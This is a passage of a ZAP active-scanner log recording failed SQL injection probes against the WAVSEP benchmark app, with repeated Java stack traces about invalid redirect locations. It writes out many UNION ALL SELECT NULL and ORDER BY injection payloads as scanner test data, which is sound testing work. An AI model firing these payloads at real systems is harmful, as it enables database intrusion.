http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682278 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682280 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682280 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682281 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682282 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 5966#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 5966# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682283 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682283 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682284 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682285 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682286 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682286 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682287 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 